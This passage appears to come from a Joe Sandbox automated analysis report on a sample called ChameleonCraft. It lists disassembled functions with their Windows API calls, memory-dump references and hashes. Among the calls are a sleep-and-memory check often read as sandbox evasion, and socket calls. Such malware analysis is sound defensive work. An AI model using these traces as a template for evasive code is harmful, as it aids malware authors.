                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                          • String ID:
                                                          • API String ID: 1539411459-0
                                                          • Opcode ID: fe8ff05e419c930bc003cea10d33d0732474b4a24bfcb4ad6edc1591f83c06c7
                                                          • Instruction ID: 9dc65e74461cb2cb109d137e9aaa49c6ef6f0f60b10b7e8214b2c74ec852c43b
                                                          • Opcode Fuzzy Hash: fe8ff05e419c930bc003cea10d33d0732474b4a24bfcb4ad6edc1591f83c06c7
                                                          • Instruction Fuzzy Hash: CDF0E231045228BBDB13AF94AC0DFCE3F69AF06320F048100FA11660E283B41962DFE9
                                                          Function 009A25F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSysColor.USER32(00000008,00000000), ref: 009A260D
                                                          • SetTextColor.GDI32(?,000000FF,00000000), ref: 009A2617
                                                          • SetBkMode.GDI32(?,00000001), ref: 009A262C
                                                          • GetStockObject.GDI32(00000005), ref: 009A2634
                                                          • GetWindowDC.USER32(?,00000000), ref: 009DC1C4
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 009DC1D1
                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 009DC1EA
                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 009DC203
                                                          • GetPixel.GDI32(00000000,?,?), ref: 009DC223
                                                          • ReleaseDC.USER32(?,00000000), ref: 009DC22E
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                          • String ID:
                                                          • API String ID: 1946975507-0
                                                          • Opcode ID: 5708701c5a8c8b2ddde242370c751129876e08d08d4eee13bb8869f62da4f57d
                                                          • Instruction ID: aa05523a7295bce9239f6fe2bc7d58367802a92b9961b8451bd35a1214c1fbcd
                                                          • Opcode Fuzzy Hash: 5708701c5a8c8b2ddde242370c751129876e08d08d4eee13bb8869f62da4f57d
                                                          • Instruction Fuzzy Hash: B4E06D31544244BFDB229FE8BC09BD83B19EB15332F04C366FA79580E187714981DB11
                                                          Function 009E0679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 009E0679
                                                          • GetDC.USER32(00000000), ref: 009E0683
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009E06A3
                                                          • ReleaseDC.USER32(?,?,?,?,?), ref: 009E06C4
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: 4a6ea490d173da2b496ad3c8f57651448d8b3c89893309b167836e6f8d4f1cf8
                                                          • Instruction ID: 0db6b3f67b7d76a4f190cf2779a8f87714ba253a052306dacf4e21447a3dab83
                                                          • Opcode Fuzzy Hash: 4a6ea490d173da2b496ad3c8f57651448d8b3c89893309b167836e6f8d4f1cf8
                                                          • Instruction Fuzzy Hash: 70E01AB1800204EFCB019FB0DC1AB5DBBF5EBCC310F118415F85AA7650DBB895529F50
                                                          Function 009E068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 009E068D
                                                          • GetDC.USER32(00000000), ref: 009E0697
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009E06A3
                                                          • ReleaseDC.USER32(?,?,?,?,?), ref: 009E06C4
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: c6cc53e4e8eff25c54e79a35fbfb297b96c26dd0bb72917d15893b2f521ee32a
                                                          • Instruction ID: 709c09845117f4d895de45942854f59e3c9cdc660950c973acd100dffdee807b
                                                          • Opcode Fuzzy Hash: c6cc53e4e8eff25c54e79a35fbfb297b96c26dd0bb72917d15893b2f521ee32a
                                                          • Instruction Fuzzy Hash: CEE012B1800204AFCB019FB0EC1AA9DBBF5AB8C310F108418F95AA7250DBB895528F90
                                                          Function 009AE00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 009AE01E
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 009AE037
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          • Opcode ID: 19d559389f7403a48b93a79804a783acc28ff43e7474ef82f19530adc43486b4
                                                          • Instruction ID: b16e534d784f1c1f1deb06d64b2a8ac5ef36355d25b35421fffc44039bcf882d
                                                          • Opcode Fuzzy Hash: 19d559389f7403a48b93a79804a783acc28ff43e7474ef82f19530adc43486b4
                                                          • Instruction Fuzzy Hash: 2B5148714087449BE320AF60EC86BAFBBF8FBC5714F41484DF2D8411A1EBB19529CB56
                                                          Function 00A28096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000027,00001132,00000000,?,?,?,?), ref: 00A28186
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A2819B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: '
                                                          • API String ID: 3850602802-1997036262
                                                          • Opcode ID: f8b5088ec91b957d9c2048c09fd397b945bd1f602f19cd226c8429c7378a46a3
                                                          • Instruction ID: ba4792925e49d0b94fc7afeccfb7a59eb8ad66fecf99cba64da24e0efe2913fb
                                                          • Opcode Fuzzy Hash: f8b5088ec91b957d9c2048c09fd397b945bd1f602f19cd226c8429c7378a46a3
                                                          • Instruction Fuzzy Hash: A3410774A062199FDB14CF68D881BDABBB5FF09300F10017AF908AB391DB75A956CF90
                                                          Function 00A140B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __snwprintf.LIBCMT ref: 00A14132
                                                            • Part of subcall function 009B1A36: _memmove.LIBCMT ref: 009B1A77
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: __snwprintf_memmove
                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                          • API String ID: 3506404897-2584243854
                                                          • Opcode ID: 3a21402bfe110229041fb0b16269e53f20f5260ce02ecf8ea24e7556d5e019d9
                                                          • Instruction ID: 2b55918ce1679a137532d0c73082a21db88e53814712c061504594b098290012
                                                          • Opcode Fuzzy Hash: 3a21402bfe110229041fb0b16269e53f20f5260ce02ecf8ea24e7556d5e019d9
                                                          • Instruction Fuzzy Hash: 1C21C131A0021CBBCF00EF68C9A5FEE77B5BF98741F400454F945A7241DB30A985CBA1
                                                          Function 00A18475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00A186E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00A1849D,?,00000000,?,?), ref: 00A186F7
                                                          • #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A184A0
                                                          • #9.WSOCK32(00000000,?,00000000), ref: 00A184DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide
                                                          • String ID: 255.255.255.255
                                                          • API String ID: 626452242-2422070025
                                                          • Opcode ID: b6111af33e30fcfaa8531f4936f8b38f19114805e6bb7f52d93178101cd36560
                                                          • Instruction ID: 99d8f15db4f69f733904c1296791bbcb5c33fabb8fd07543d7d9905e2f53c7ca
                                                          • Opcode Fuzzy Hash: b6111af33e30fcfaa8531f4936f8b38f19114805e6bb7f52d93178101cd36560
                                                          • Instruction Fuzzy Hash: 74118E7520020AABDB10EFA4CC46FEEB724FF44320F10851AFA2597292DF75A854C7A9
                                                          Function 009E0251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 009E0091
                                                            • Part of subcall function 00A1C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,009E027A,?), ref: 00A1C6E7
                                                            • Part of subcall function 00A1C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A1C6F9
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 009E0289
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                          • String ID: WIN_XPe
                                                          • API String ID: 582185067-3257408948
                                                          • Opcode ID: 92c7bb6ab70a6e7f4c1ab3b6b7b2143c6c4323671a0c9ef4797caf1fa58d8f3a
                                                          • Instruction ID: 4e3bc76c8cd44cc003805c2b5bbc8e5c00807f7477524045feb3ec6420301177
                                                          • Opcode Fuzzy Hash: 92c7bb6ab70a6e7f4c1ab3b6b7b2143c6c4323671a0c9ef4797caf1fa58d8f3a
                                                          • Instruction Fuzzy Hash: 47F0C971845149DFCB16DBA1C998BEDBBB8AB88301F641485E146A2190CBB54F85DF21